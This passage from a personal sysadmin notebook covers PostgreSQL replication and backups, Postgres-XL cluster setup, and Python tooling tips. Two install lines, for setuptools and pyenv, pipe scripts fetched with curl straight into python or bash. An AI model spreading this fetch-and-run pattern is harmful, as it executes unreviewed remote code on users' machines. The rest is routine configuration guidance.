42.1.49 Difference between fsync and synchronous_commit ? http://dba.stackexchange.com/questions/18509/difference-between-fsync-and-synchronous-commit-postgresql http://www.postgresql.org/docs/9.3/static/runtime-config-wal.html#GUC-SYNCHRONOUS-COMMIT

42.1.50 standby_mode

standby_mode= off

When standby_mode is enabled, the PostgreSQL server will work as a standby. It will continuously wait for the additional XLOG records, using restore_command and/or primary_conninfo. https://github.com/postgres/postgres/blob/master/src/backend/access/transam/recovery.conf.sample#L110

42.1.51 primary_conninfo

primary_conninfo='' # e.g. 'host=localhost port=5432'

If set, the PostgreSQL server will try to connect to the primary using this connection string and receive XLOG records continuously. https://github.com/postgres/postgres/blob/master/src/backend/access/transam/recovery.conf.sample#L120

42.1.52 trigger_file

trigger_file=''


By default, a standby server keeps restoring XLOG records from the primary indefinitely. If you want to stop the standby mode, finish recovery and open the system in read/write mode, specify a path to a trigger file. The server will poll the trigger file path periodically and start as a primary server when it’s found. https://github.com/postgres/postgres/blob/master/src/backend/access/transam/recovery.conf.sample#L132 http://www.archaeogeek.com/blog/2011/08/11/setting-up-a-postgresql-standby-servers/
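For example, with the trigger_file shown earlier set to /tmp/postgresql.trigger.5432, promotion can be requested simply by creating that file (a sketch; on PostgreSQL 9.1 and later, pg_ctl promote is an alternative that does not need a trigger file):

$ touch /tmp/postgresql.trigger.5432   # the standby notices the file, finishes recovery and opens read/write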

42.1.53 Testing a PostgreSQL slave/master cluster using Docker http://aliceh75.github.io/testing-postgresql-cluster-using-docker

42.1.54 Postgres streaming replication with docker

For custom configuration file, If we do this:

$ docker run --name ps-master -v /somewhere/postgres/master/data:/var/lib/postgresql/data postgres:9.4
$ docker start ps-master
$ vim /somewhere/postgres/master/data/postgresql.conf
$ vim /somewhere/postgres/master/data/pg_hba.conf
$ docker restart ps-master

As you can see, we then need to edit those files and restart the server again. Also, because of this error:

initdb: directory "/var/lib/postgresql/data" exists but is not empty

We can’t do it this way:

$ docker run --rm --name ps-master \
    -v /somewhere/postgres/data:/var/lib/postgresql/data \
    -v /somewhere/postgres/postgresql.conf:/var/lib/postgresql/data/postgresql.conf \
    -v /somewhere/postgres/pg_hba.conf:/var/lib/postgresql/data/pg_hba.conf \
    postgres:9.4

But we can do it this way, by putting a script in the special docker-entrypoint-initdb.d directory:

$ docker run --rm --name ps-master \
    -v /somewhere/postgres/data:/var/lib/postgresql/data \
    -v /somewhere/postgres/script:/docker-entrypoint-initdb.d \
    -v /somewhere/postgres/config:/config \
    postgres:9.4

$ ls -la /somewhere/postgres/script

drwxr-xr-x 2 postgres postgres 4096 Apr 2 12:22 .
drwxr-xr-x 7 postgres postgres 4096 Apr 2 12:18 ..
-rw-r--r-- 1 postgres postgres  169 Apr 2 12:22 copy_configuration_files.sh

$ cat /somewhere/postgres/script/copy_configuration_files.sh

#!/bin/bash
echo "Copy configuration files !!"
cp /config/postgresql.conf /var/lib/postgresql/data/postgresql.conf
cp /config/pg_hba.conf /var/lib/postgresql/data/pg_hba.conf

$ ls -la /somewhere/postgres/config

drwxr-xr-x 2 postgres postgres  4096 Apr 2 12:22 .
drwxr-xr-x 7 postgres postgres  4096 Apr 2 12:18 ..
-rw------- 1 postgres postgres  4523 Apr 2 12:21 pg_hba.conf
-rw------- 1 postgres postgres 21350 Apr 2 12:22 postgresql.conf

docker run --rm --name ps-master \
    -v /somewhere/postgres/data:/var/lib/postgresql/data \
    -v /somewhere/postgres/postgresql.conf:/usr/share/postgresql/9.4/postgresql.conf.sample \
    -v /somewhere/postgres/pg_hba.conf:/usr/share/postgresql/9.4/pg_hba.conf.sample \
    postgres:9.4

https://github.com/docker-library/postgres/issues/105
https://github.com/docker-library/postgres/pull/127

42.1.55 Show the value of a run-time parameter

$ psql -U postgres
postgres=# SHOW ALL;
postgres=# SHOW hba_file;

http://www.postgresql.org/docs/8.2/static/sql-show.html

42.1.56 Postgres DB Size Command

postgres=# select pg_database_size('databaseName');

postgres=# select t1.datname AS db_name,
                  pg_size_pretty(pg_database_size(t1.datname)) as db_size
           from pg_database t1
           order by pg_database_size(t1.datname) desc;

postgres=# \l+

postgres=# SELECT pg_database.datname,
                  pg_size_pretty(pg_database_size(pg_database.datname)) AS size
           FROM pg_database;

postgres=# SELECT
    t.tablename,
    indexname,
    c.reltuples AS num_rows,
    pg_size_pretty(pg_relation_size(quote_ident(t.tablename)::text)) AS table_size,
    pg_size_pretty(pg_relation_size(quote_ident(indexrelname)::text)) AS index_size,
    CASE WHEN indisunique THEN 'Y' ELSE 'N' END AS UNIQUE,
    idx_scan AS number_of_scans,
    idx_tup_read AS tuples_read,
    idx_tup_fetch AS tuples_fetched
FROM pg_tables t
LEFT OUTER JOIN pg_class c ON t.tablename = c.relname
LEFT OUTER JOIN (
    SELECT c.relname AS ctablename, ipg.relname AS indexname, x.indnatts AS number_of_columns,
           idx_scan, idx_tup_read, idx_tup_fetch, indexrelname, indisunique
    FROM pg_index x
    JOIN pg_class c ON c.oid = x.indrelid
    JOIN pg_class ipg ON ipg.oid = x.indexrelid
    JOIN pg_stat_all_indexes psai ON x.indexrelid = psai.indexrelid
) AS foo ON t.tablename = foo.ctablename
WHERE t.schemaname = 'public'
ORDER BY 1, 2;

https://gist.github.com/next2you/628866#file-postgres-long-running-queries-sql

42.1.57 High Availability and Load Balancing

http://www.postgresql.org/docs/8.2/static/high-availability.html

There are basically 3 types of replication in PostgreSQL, i.e. Warm standby, Hot standby and Streaming Replication.

https://github.com/zalando/patroni
https://github.com/sorintlab/stolon
https://github.com/CrunchyData/crunchy-containers

42.1.58 Replication https://www.2ndquadrant.com/en/resources/pglogical/

42.1.59 Multi-master replication http://stackoverflow.com/questions/19657514/multi-master-replication-in-postgresql https://en.wikipedia.org/wiki/Multi-master_replication https://wiki.postgresql.org/wiki/Replication,_Clustering,_and_Connection_Pooling#Comparison_matrix https://www.cybertec-postgresql.com/en/postgresql-affiliate-projects-for-horizontal-multi-terabyte-scaling/


42.2 Backups

42.2.1 Barman

Barman (Backup and Recovery Manager) is an open-source administration tool for disaster recovery of PostgreSQL servers written in Python. It allows your organisation to perform remote backups of multiple servers in business critical environments and help DBAs during the recovery phase. http://www.pgbarman.org/about/

42.2.2 How To Backup and Restore PostgreSQL Database Using pg_dump and psql

Use pg_dump to get backup:

$ pg_dump -U <username> -h <host> -d <db_name> > <backup_file.sql>
$ pg_dump -U postgres -h 127.0.0.1 -d redmine > redmine.sql

Use psql to restore backup:

$ psql -U <username> -h <host> -d <db_name> -f <backup_file.sql>
$ psql -U postgres -h 172.17.0.2 -d redmine -f redmine_backup_pg_dump.sql

http://www.thegeekstuff.com/2009/01/how-to-backup-and-restore-postgres-database-using-pg_dump-and-psql/
http://www.postgresql.org/docs/9.1/static/backup.html

42.3 Postgres-XL

42.4 Nodes Concept

Postgres-XL is composed of three major components called the GTM, Coordinator and Datanode. The GTM is responsible for providing the ACID properties of transactions. The Datanode stores table data and handles SQL statements locally. The Coordinator handles each SQL statement from applications, determines which Datanode to go to, and sends plans on to the appropriate Datanodes. The Coordinators and Datanodes of Postgres-XL are essentially PostgreSQL database servers.

You usually should run GTM on a separate server because GTM has to take care of transaction requirements from all the Coordinators and Datanodes. To group multiple requests and responses from Coordinator and Datanode processes running on the same server, you can configure GTM-Proxy. GTM-Proxy reduces the number of interactions and the amount of data to GTM. GTM-Proxy also helps handle GTM failures.

It is often good practice to run both Coordinator and Datanode on the same server because we don’t have to worry about workload balance between the two, and you can often get at data from replicated tables locally without sending an additional request out on the network. You can have any number of servers where these two components are running. Because both Coordinator and Datanode are essentially PostgreSQL instances, you should configure them to avoid resource conflict. It is very important to assign them different working directories and port numbers.

https://www.postgres-xl.org/documentation/tutorial-arch.html


42.5 Table distributing concept

CREATE TABLE DISTRIBUTE BY ...

REPLICATION: Each row of the table will be replicated to all the Datanodes of the Postgres-XL database cluster.

ROUNDROBIN: Each row of the table will be placed in one of the Datanodes in a round-robin manner. The value of the row will not be needed to determine what Datanode to go to.

HASH (column_name): Each row of the table will be placed based on the hash value of the specified column. The following types are allowed as the distribution column: INT8, INT2, OID, INT4, BOOL, INT2VECTOR, OIDVECTOR, CHAR, NAME, TEXT, BPCHAR, BYTEA, VARCHAR, NUMERIC, MONEY, ABSTIME, RELTIME, DATE, TIME, TIMESTAMP, TIMESTAMPTZ, INTERVAL, and TIMETZ. Please note that floating point is not allowed as a basis of the distribution column.

MODULO (column_name): Each row of the table will be placed based on the modulo of the specified column. The following types are allowed as the distribution column: INT8, INT2, INT4, BOOL, ABSTIME, RELTIME, DATE. Please note that floating point is not allowed as a basis of the distribution column.

If DISTRIBUTE BY is not specified, columns with a UNIQUE constraint will be chosen as the distribution key. If no such column is specified, the distribution column is the first eligible column in the definition. If no such column is found, then the table will be distributed by ROUNDROBIN. You can Alter a replicated table to make it a distributed table.

https://www.postgres-xl.org/documentation/sql-createtable.html
https://www.postgres-xl.org/documentation/tutorial-createcluster.html
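As an illustration of the syntax above, a hypothetical table sharded by its id column (names are made up; note that the primary key contains the distribution column, which the next section requires):

CREATE TABLE orders (
    id     INT8 NOT NULL,
    status TEXT,
    PRIMARY KEY (id)
) DISTRIBUTE BY HASH (id);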

42.6 Shard limitation

• (...) in distributed tables, UNIQUE constraints must include the distribution column of the table
• (...) the distribution column must be included in PRIMARY KEY
• (...) column with REFERENCES (FK) should be the distribution column.
• (...) PRIMARY KEY must be the distribution column as well.

In Postgres-XL, in distributed tables, UNIQUE constraints must include the distribution column of the table. This is because Postgres-XL currently only allows constraints that it can push down to the Datanodes to be enforced locally. If we include the distribution column in unique constraints, it stands to reason that they can be enforced locally. If a table is distributed by ROUNDROBIN, we cannot enforce UNIQUE constraints because it does not have a distribution column; it is possible that the same value for a column exists on multiple nodes. There is no restriction on UNIQUE constraints in replicated tables. When an expression is used in a UNIQUE constraint, this expression must contain the distribution column of its parent table; it cannot use other columns.

As mentioned when discussing UNIQUE constraints, the distribution column must be included in the PRIMARY KEY. Other restrictions apply to the PRIMARY KEY as well. When an expression is used in a PRIMARY KEY constraint, this expression must contain the distribution column of its parent table; it cannot use other columns.

Please note that a column with REFERENCES should be the distribution column. This limitation is introduced because constraints are enforced only locally in each Datanode. In Postgres-XL, you cannot specify both PRIMARY KEY and REFERENCES keys for different columns. In Postgres-XL, you cannot omit the column name in the REFERENCES clause. In Postgres-XL, you cannot specify more than one foreign key constraint. Postgres-XL does not support exclusion constraints. Postgres-XL does not allow modifying the value of the distribution column.

https://www.postgres-xl.org/documentation/ddl-constraints.html
https://www.postgres-xl.org/documentation/dml-update.html
https://stackoverflow.com/questions/28547437/migrating-from-postgresql-to-postgres-xl-distributed-tables-design
https://www.postgres-xl.org/documentation/upgrading.html

42.7 High Availability

You can add slaves for each node analogous to PostgreSQL's streaming replication. In addition, the cluster can be configured such that the Global Transaction Manager (GTM) can have a GTM Standby. In terms of automatic failover, it is currently not part of the core project, but Corosync/Pacemaker has been used for this purpose.

https://www.postgres-xl.org/documentation/warm-standby-failover.html
https://www.postgres-xl.org/faq/
https://github.com/ClusterLabs/PAF
https://github.com/bitnine-oss/postgres-xl-ha

42.8 Download

https://www.postgres-xl.org/download/

42.9 Setting up Postgres-XL cluster

42.9.1 Install Postgres-XL

On each host:

• postgres-xl-gtm (192.168.0.140)
• postgres-xl-cr1 (192.168.0.141)
• postgres-xl-dn1 (192.168.0.142)
• postgres-xl-dn2 (192.168.0.143)

Do the following commands:


# Install requirements
$ sudo apt-get upgrade
$ sudo apt-get install build-essential
$ sudo apt-get install libreadline-dev
$ apt-get install zlib1g-dev
$ apt-get install flex

# Download postgres-xl
$ wget https://www.postgres-xl.org/downloads/postgres-xl-9.5r1.6.tar.bz2
$ tar -xvjpf postgres-xl-9.5r1.6.tar.bz2
$ cd postgres-xl-9.5r1.6

# Install postgres-xl
$ ./configure
$ make
All of Postgres-XL successfully made. Ready to install.
$ sudo make install
Postgres-XL installation complete.

# Install pgxc_ctl
$ cd contrib
$ make
$ sudo make install

$ sudo adduser postgres
$ su postgres
$ vim /home/postgres/.bashrc
export PATH=/usr/local/pgsql/bin:$PATH

$ mkdir ~/.ssh

To fix these probable errors:

bash: gtm_ctl: command not found
bash: pg_ctl: command not found
initdb: invalid locale settings; check LANG and LC_* environment variables

Add these lines to /etc/environment:

$ vim /etc/environment

PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/

˓→usr/local/games:/usr/local/pgsql/bin:" export LANG=en_US.utf-8 export LC_ALL=en_US.utf-8

On postgres-xl-gtm host:

$ su postgres
$ ssh-keygen -t rsa
Enter file in which to save the key (/home/postgres/.ssh/id_rsa):
$ cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys

$ scp ~/.ssh/authorized_keys postgres@192.168.0.141:~/.ssh/
$ scp ~/.ssh/authorized_keys postgres@192.168.0.142:~/.ssh/
$ scp ~/.ssh/authorized_keys postgres@192.168.0.143:~/.ssh/

On every host:


$ chmod 700 ~/.ssh $ chmod 600 ~/.ssh/authorized_keys

On the postgres-xl-gtm host, check the ssh connection to the other hosts:

$ ssh postgres@192.168.0.141
$ ssh postgres@192.168.0.142
$ ssh postgres@192.168.0.143

42.9.2 Configure Postgres-XL

Configure pgxc_ctl.conf on postgres-xl-gtm host:

$ export dataDirRoot=$HOME/DATA/pgxl/nodes
$ mkdir $HOME/pgxc_ctl
$ pgxc_ctl

/bin/bash
Installing pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.
ERROR: File "/home/postgres/pgxc_ctl/pgxc_ctl.conf" not found or not a regular file. No such file or directory
Installing pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.
Reading configuration using /home/postgres/pgxc_ctl/pgxc_ctl_bash --home /home/postgres/pgxc_ctl --configuration /home/postgres/pgxc_ctl/pgxc_ctl.conf
Finished reading configuration.
   ******** PGXC_CTL START ***************

Current directory: /home/postgres/pgxc_ctl

Create empty configuration file, on the PGXC console:

PGXC$ prepare config empty
PGXC$ exit

$ vim ~/pgxc_ctl/pgxc_ctl.conf

pgxcOwner=postgres
coordPgHbaEntries=(192.168.0.0/24)
datanodePgHbaEntries=(192.168.0.0/24)

Configure gtm master node:

$ pgxc_ctl
PGXC$ add gtm master gtm 192.168.0.140 20001 $dataDirRoot/gtm
PGXC$ monitor all
"""
Running: gtm master
"""

Configure coordinator nodes:

PGXC$ add coordinator master cr1 192.168.0.141 30001 30011 $dataDirRoot/cr_master.1 none none
"""
Success.
Starting coordinator master cr1
LOG:  redirecting log output to logging collector process
HINT:  Future log output will appear in directory 'pg_log'.
Done.
"""

PGXC$ monitor all
"""
Running: gtm master
Running: coordinator master cr1
"""

PGXC$ add coordinator master cr2 192.168.0.142 30002 30012 $dataDirRoot/cr_master.2 none none
"""
Success.
Starting coordinator master cr2
LOG:  redirecting log output to logging collector process
HINT:  Future log output will appear in directory 'pg_log'.
Done.
"""

PGXC$ monitor all
"""
Running: gtm master
Running: coordinator master cr1
Running: coordinator master cr2
"""

Configure data nodes:

PGXC$ add datanode master dn1 192.168.0.143 40001 40011 $dataDirRoot/dn_master.1 none none none
"""
Success.
Starting datanode master dn1.
LOG:  redirecting log output to logging collector process
HINT:  Future log output will appear in directory 'pg_log'.
Done.
"""

PGXC$ monitor all
"""
Running: gtm master
Running: coordinator master cr1
Running: coordinator master cr2
Running: datanode master dn1
"""

PGXC$ add datanode master dn2 192.168.0.144 40002 40012 $dataDirRoot/dn_master.2 none none none
"""
Success
Starting datanode master dn2.
LOG:  redirecting log output to logging collector process
HINT:  Future log output will appear in directory 'pg_log'.
Done.
"""

PGXC$ monitor all
"""
Running: gtm master
Running: coordinator master cr1
Running: coordinator master cr2
Running: datanode master dn1
Running: datanode master dn2
"""

# To stop
PGXC stop gtm master
PGXC stop coordinator master cr1
PGXC stop coordinator master cr2
PGXC stop datanode master dn1
PGXC stop datanode master dn2

# To start
PGXC start gtm master
PGXC start coordinator master cr1
PGXC start coordinator master cr2
PGXC start datanode master dn1
PGXC start datanode master dn2

https://stackoverflow.com/questions/29225743/installing-postgres-xl-in-linux-in-distributed-environment
https://ruihaijiang.wordpress.com/2015/09/17/postgres-xl-installation-example-on-linux/

42.10 Docker

https://github.com/tiredpixel/postgres-xl-docker

42.11 Ansible

https://gitlab.com/ansible-postgres-xl/postgres-xl-cluster/tree/master

42.12 Django

https://github.com/omidraha/django-postgres-xl-example

42.13 Links

https://www.postgres-xl.org/faq/
https://github.com/bitnine-oss/postgres-xl-ha
https://github.com/systemapic/wu/wiki/Installing-Postgresql-XL
https://www.postgres-xl.org/documentation/admin.html
https://stackoverflow.com/questions/42431018/can-postgres-xl-shard-replicate-and-auto-balance-at-the-same-time

CHAPTER 43

Python

Contents:

43.1 Tips

43.1.1 String in Python 2 and 3

Python 2's unicode() type was renamed str() in Python 3, str() was renamed bytes(), and basestring() disappeared. In Python 3 all strings are Unicode, while in Python 2 strings are bytes by default.
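A short illustration of this difference (Python 3 shown; in Python 2 the equivalent pair was unicode() and str()):

# Python 3: str holds Unicode text, bytes holds raw bytes; mixing them raises TypeError.
text = "café"                 # str (Unicode)
data = text.encode("utf-8")   # bytes

assert isinstance(text, str)
assert isinstance(data, bytes)
assert data.decode("utf-8") == text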

43.1.2 OAUTH

from oauth2client.client import OAuth2WebServerFlow

GOOGLE_CLIENT_ID = '****'
GOOGLE_CLIENT_SECRET = '****'


# server side
def get_flow(redirect_url=None):
    return OAuth2WebServerFlow(client_id=GOOGLE_CLIENT_ID,
                               client_secret=GOOGLE_CLIENT_SECRET,
                               scope='profile email',
                               redirect_uri=redirect_url)


# Server creates the oauth link with the return url
flow = get_flow('http://localhost:8000/auth/next/')
url = flow.step1_get_authorize_url()

# Client side
# Client redirects the user to this url:
# https://accounts.google.com/o/oauth2/auth?scope=profile+email&redirect_uri=....
# Internal Google redirection:
# https://accounts.google.com/ServiceLogin?passive=1209600
# &continue=https://accounts.google.com/o/oauth2/auth?access_type....
# Google interactive login page
# Google finally redirects the user to the return url:
# http://localhost:8000/auth/next/?code=******

# Server gets credentials from the code
code = '******'
credentials = flow.step2_exchange(code)
print(credentials.__dict__)

43.1.3 Simple HTTP Server with Python

# Python 2
$ python -m SimpleHTTPServer 8002
# Python 3
$ python -m http.server 8002

43.1.4 What exactly does the T and Z mean in timestamp?

The T doesn’t really stand for anything. It is just the separator that the ISO 8601 combined date-time format requires. You can read it as an abbreviation for Time. The Z stands for the Zero timezone, as it is offset by 0 from the Coordinated Universal Time (UTC). Both characters are just static letters in the format, which is why they are not documented by the datetime.strftime() method. You could have used Q or M or Monty Python and the method would have returned them unchanged as well; the method only looks for patterns starting with % to replace those with information from the datetime object. http://stackoverflow.com/a/29282022
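For example, isoformat() emits the T separator itself, while in strftime() the T and Z are passed through as literal characters (the printed timestamps are of course illustrative):

from datetime import datetime, timezone

now = datetime.now(timezone.utc)

# isoformat() inserts the 'T' separator and renders UTC as '+00:00'
print(now.isoformat())                     # e.g. 2019-10-28T12:34:56.789012+00:00

# strftime() only substitutes the %-patterns; 'T' and 'Z' are kept verbatim
print(now.strftime("%Y-%m-%dT%H:%M:%SZ"))  # e.g. 2019-10-28T12:34:56Z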

43.2 Modules

43.2.1 Dict Validator

https://pypi.python.org/pypi/voluptuous/
https://github.com/alecthomas/voluptuous
https://github.com/j2labs/schematics
https://github.com/dfm/schematics
https://github.com/j2labs/dictshield
https://github.com/exfm/dictshield
http://notario.cafepais.com/docs/index.html
https://github.com/greenwoodcm/dict-validator
https://github.com/halst/schema
https://github.com/onyxfish/jsonschema
https://github.com/Deepwalker/procrustes


43.2.2 Schematics

converter: an initial simple value converter, for example "180" to 180 or to 180.0, or "" to None.
filter(s): convert a value to another (more complex) format, for example "22/5/2013" to datetime(22, 5, 2013).
validator: validate a value and return the value or raise an exception.
serialization: serialize a value.

Order of converter, filters and validators? Validators, filters and the converter may all raise exceptions.

Step 1: SampleModel(data). The Model gets raw_data as a dict and then passes the value of each key of the dict to the corresponding field of the Model. Every field tries to convert the given value to a Python data object. For example, for the input {'service_name': 123} with service_name declared as a StringType in the Model, it will be converted to {'service_name': u'123'}. Exceptions may also be raised here; for example, if we give {'service_name': 12.3} to the Model, it will raise a schematics.exceptions.ModelConversionError(u"Couldn't interpret value as string.") exception. At the end, the converted data is accessible from the _data attribute of the Model instance: SampleModel(data)._data

Step 2: SampleModel(data).validate(). The converted data in _data is passed to each validator of the field. In every validation, before a value is validated, the value is passed to the convert method of the field, and _data is updated for that value if the validation passes. Look at: /usr/local/lib/python2.7/dist-packages/schematics/validate.py:52
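A minimal sketch of the two steps above, using a hypothetical SampleModel built around the service_name field from this example:

from schematics.exceptions import ModelConversionError
from schematics.models import Model
from schematics.types import StringType


class SampleModel(Model):
    service_name = StringType()


# step 1: instantiation converts the raw dict, field by field
m = SampleModel({'service_name': 123})
print(m._data)   # {'service_name': u'123'}; the int was converted to a string

# step 2: validate() runs the field validators over the converted data
m.validate()

# a value the converter cannot interpret fails already at step 1
try:
    SampleModel({'service_name': 12.3})
except ModelConversionError as exc:
    print(exc)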

43.2.3 libnotify

https://wiki.archlinux.org/index.php/libnotify#Python

Install the libnotify and python-gobject packages.

#!/usr/bin/python
from gi.repository import Notify
Notify.init("Hello world")
Hello = Notify.Notification.new("Hello world",
                                "This is an example notification.",
                                "dialog-information")
Hello.show()

You may also use notify-send (on Debian-based systems, install the libnotify-bin package):

notify-send -i 'dialog-information' 'Summary' 'Message body.'

also kdialog’s passive popup option can be used:

kdialog --passivepopup <text> <timeout>
kdialog --passivepopup 'This is a notification' 5

43.2.4 Terminal

npyscreen https://pypi.python.org/pypi/npyscreen/
Urwid http://urwid.org/index.html
blessed https://github.com/jquast/blessed

43.2.5 Install lxml on pyenv (virtual env)

43.3 Doctest

http://docs.python.org/2/library/doctest.html

43.3.1 Directives

http://docs.python.org/2/library/doctest.html#option-flags
http://docs.python.org/2/library/doctest.html#directives

# doctest: +ELLIPSIS

Next up, we are exploring the ellipsis.

>>> import sys
>>> sys.modules  # doctest: +ELLIPSIS
{...'sys':...}
>>> 'This is an expression that evaluates to a string'
... # doctest: +ELLIPSIS
'This is ... a string'
>>> 'This is also a string'  # doctest: +ELLIPSIS
'This is ... a string'
>>> import datetime
>>> datetime.datetime.now().isoformat()  # doctest: +ELLIPSIS
'...-...-...T...:...:...'

# doctest: +NORMALIZE_WHITESPACE

Next, a demonstration of whitespace normalization.

>>> [1, 2, 3, 4, 5, 6, 7, 8, 9]
... # doctest: +NORMALIZE_WHITESPACE
[1, 2,3, 4, 5,6, 7, 8,9]
>>> import sys
>>> sys.stdout.write("This text\n contains weird spacing.")
... # doctest: +NORMALIZE_WHITESPACE
This text
contains weird spacing.

# doctest: +SKIP

Now we are telling doctest to skip a test.

>>> 'This test would fail.'  # doctest: +SKIP
If it were allowed to run.


This “test a little, code a little” style of programming is called Test-Driven Development, and you’ll find that it’s very productive.

43.4 South

43.4.1 Enable South for django apps(Converting existing apps)

Edit your settings.py and put south into INSTALLED_APPS (assuming you've installed it to the right place). Run python manage.py syncdb to load the South table into the database. Note that syncdb looks different now: South modifies it. Run python manage.py convert_to_south myapp and South will automatically make and pretend to apply your first migration.

43.4.2 Example of using South for a model

Change the model field, then run the following command to detect the change and create a new migration file (such as 001):

$ python manage.py schemamigration myapp --auto

Run the following command to update the migration table (south_migrationhistory) in the database and apply the change to the myapp models in the database:

$ python manage.py migrate myapp

43.5 PIP

43.5.1 Install pip

# install setup tools
curl https://bitbucket.org/pypa/setuptools/raw/bootstrap/ez_setup.py | python -
# install pip
curl -L https://raw.github.com/pypa/pip/master/contrib/get-pip.py | python -

43.5.2 Use mirror to install packages

What to do when PyPI goes down

Using the mirror flag:

pip install --use-mirrors Django==1.6

43.5.3 virtualenv

install it:

pip install virtualenv

make a virtualenv:

cd /srv/www/project_name
virtualenv --no-site-packages env

start it:

source env/bin/activate

install a package:

pip install django==1.8

43.5.4 pyenv

Install build packages:

$ sudo apt-get install -y make build-essential libssl-dev zlib1g-dev libbz2-dev \
  libreadline-dev libsqlite3-dev wget curl llvm libncurses5-dev libncursesw5-dev xz-utils

https://github.com/yyuu/pyenv/wiki/Common-build-problems

Install pyenv:

$ curl -L https://raw.githubusercontent.com/yyuu/pyenv-installer/master/bin/pyenv-installer | bash

Add pyenv configuration to ~/.bashrc:

$ vim ~/.bash_profile

# pyenv
export PATH="/home/or/.pyenv/bin:$PATH"
eval "$(pyenv init -)"
eval "$(pyenv virtualenv-init -)"

Update it:

$ pyenv update

Uninstall it:

$ rm -rf `pyenv root`

Walk through:

$ pyenv global
$ pyenv versions
* system (set by ~/.pyenv/version)
$ pyenv install 2.7.5
$ pyenv global 2.7.5

Using pyenv virtualenv with pyenv:


$ pyenv virtualenv 2.7.5 env2.7.5
$ pyenv virtualenvs
$ pyenv activate env2.7.5
$ python -V
$ pip list
$ pyenv deactivate
$ which python

Sets the location where python-build stores temporary files

$ export TMPDIR="/tmp/pyenv"

See all available versions:

$ pyenv install --list

https://github.com/yyuu/pyenv-virtualenv
https://github.com/yyuu/pyenv-installer
http://amaral-lab.org/resources/guides/pyenv-tutorial
https://github.com/yyuu/pyenv/blob/master/plugins/python-build/README.md#special-environment-variables

43.5.5 Fixed bz2 warnings

WARNING: The Python bz2 extension was not compiled. Missing the bzip2 lib?

$ sudo apt-get install libbz2-dev

43.5.6 How do I install python-ldap in a virtualenv?

$ apt-get install libsasl2-dev python-dev libldap2-dev libssl-dev
(env)$ pip install python-ldap

43.5.7 Install python modules without root access

$ pip install --user package_name

43.5.8 Pip install from git repo branch

$ pip install git+https://github.com/ansible/ansible

43.6 uWSGI

uWSGI, Django and Nginx


43.7 Debug & Log

43.7.1 Debug

http://www.slideshare.net/GrahamDumpleton/debugging-live-python-web-applications

• Pyrasite
• Django Debug Toolbar
• mmstats
• Metrology
• Python Low-Overhead Profiler
• Shrapnel

43.7.2 Log

• Newrelic
• Graylog2
• Graylog2 github
• logstash

43.8 Async, Sync, Blocking, Non-Blocking, Threads

• gevent
• greenlet
• eventlet
• libevent
• epoll
• kqueue

43.9 Python Web frameworks

43.9.1 repoze

repoze

http://docs.repoze.org/bfg/current/narr/introduction.html#repoze-bfg-and-other-web-frameworks
http://en.wikipedia.org/wiki/BlueBream#BlueBream
https://plone.org/
http://en.wikipedia.org/wiki/Python_Paste
http://en.wikipedia.org/wiki/Pylons_project/
http://www.pylonsproject.org/about/history
http://www.turbogears.org/welcome/turbogears-way.html

During the development of the 0.9 series, several features of Paste were extracted into smaller, more focused packages. The testing suite became WebTest, the WSGI wrappers became WebOb, and the interactive debugging environment became WebError. Pylons 0.9 follows these developments by switching from Paste to the new packages, which provide more functionality with little to no backwards incompatibility issues.

Pylons Merger with repoze.bfg and Birth of the Pyramid Web Framework

Pyramid is an open source web framework written in Python and based on WSGI. It is a minimalistic web framework inspired by Zope, Pylons and Django. Pyramid was originally called "repoze.bfg". In 2010 the Pylons framework moved over to using BFG as a base in version 1.5. As a result of the inclusion of BFG into the Pylons project, BFG was renamed Pyramid.

43.10 Supervisor

43.10.1 Step by step example

Install and run supervisor

# apt-get install supervisor
# service supervisor status
# service supervisor restart

We'll assume we have a shell script that we wish to keep persistently running, saved at ~/workspace/script/run/dstat_network_bandwidth_usage.sh, which looks like the following:

#!/bin/bash
dstat -tn --output ~/workspace/script/report/dstat_network_bandwidth_usage.csv --noupdate 3600

Make this script executable:

$ chmod +x ~/workspace/script/run/dstat_network_bandwidth_usage.sh

The program configuration files for Supervisor programs are found in the /etc/supervisor/conf.d directory, normally with one program per file and a .conf extension. A simple configuration for our script, saved at /etc/supervisor/conf.d/dstat.conf, would look like so:

[program:dstat_network_bandwidth_usage]
command=~/workspace/script/run/dstat_network_bandwidth_usage.sh
autostart=true
autorestart=true
stderr_logfile=/var/log/dstat_network_bandwidth_usage.err.log
stdout_logfile=/var/log/dstat_network_bandwidth_usage.out.log
user=or

Once our configuration file is created and saved, we can inform Supervisor of our new program through the supervisorctl command. First we change directory path to /etc/supervisor/ and tell Supervisor to look for any new or changed program configurations in the /etc/supervisor/conf.d directory with:

# cd /etc/supervisor/ # supervisorctl reread

Followed by telling it to enact any changes with:


# supervisorctl update

To enter the interactive mode, start supervisorctl with no arguments:

# supervisorctl
dstat_network_bandwidth_usage    RUNNING   pid 13405, uptime 0:14:49
supervisor> status
dstat_network_bandwidth_usage    RUNNING   pid 13405, uptime 0:14:52
supervisor> restart dstat_network_bandwidth_usage
dstat_network_bandwidth_usage: stopped
dstat_network_bandwidth_usage: started
supervisor> status
dstat_network_bandwidth_usage    RUNNING   pid 13720, uptime 0:00:06
supervisor>

43.10.2 Links

https://serversforhackers.com/monitoring-processes-with-supervisord
https://www.digitalocean.com/community/tutorials/how-to-install-and-manage-supervisor-on-ubuntu-and-debian-vps

43.11 Celery

43.11.1 How to disallow pickle serialization in celery?

Add these lines to celery config file:

CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'

If that does not work, try this:

CELERY_ACCEPT_CONTENT = ['json']

from kombu import serialization
serialization.registry._decoders.pop("application/x-python-serialize")

http://stackoverflow.com/questions/6628016/how-to-disallow-pickle-serialization-in-celery

43.11.2 Is CELERY_RESULT_BACKEND necessary?

If you want to get the result of a task back, or you want to know when the task is completed, then you need a result backend.

@task
def x():
    pass

t = x.delay()
t.state   # always PENDING unless you have a RESULT_BACKEND and not ignore_result.
t.result  # always None unless...

http://docs.celeryproject.org/en/latest/configuration.html#std:setting-CELERY_RESULT_BACKEND
https://groups.google.com/forum/#!topic/celery-users/3OBTaaoKsTU

43.11.3 Using Amazon SQS

http://docs.celeryproject.org/en/latest/getting-started/brokers/sqs.html

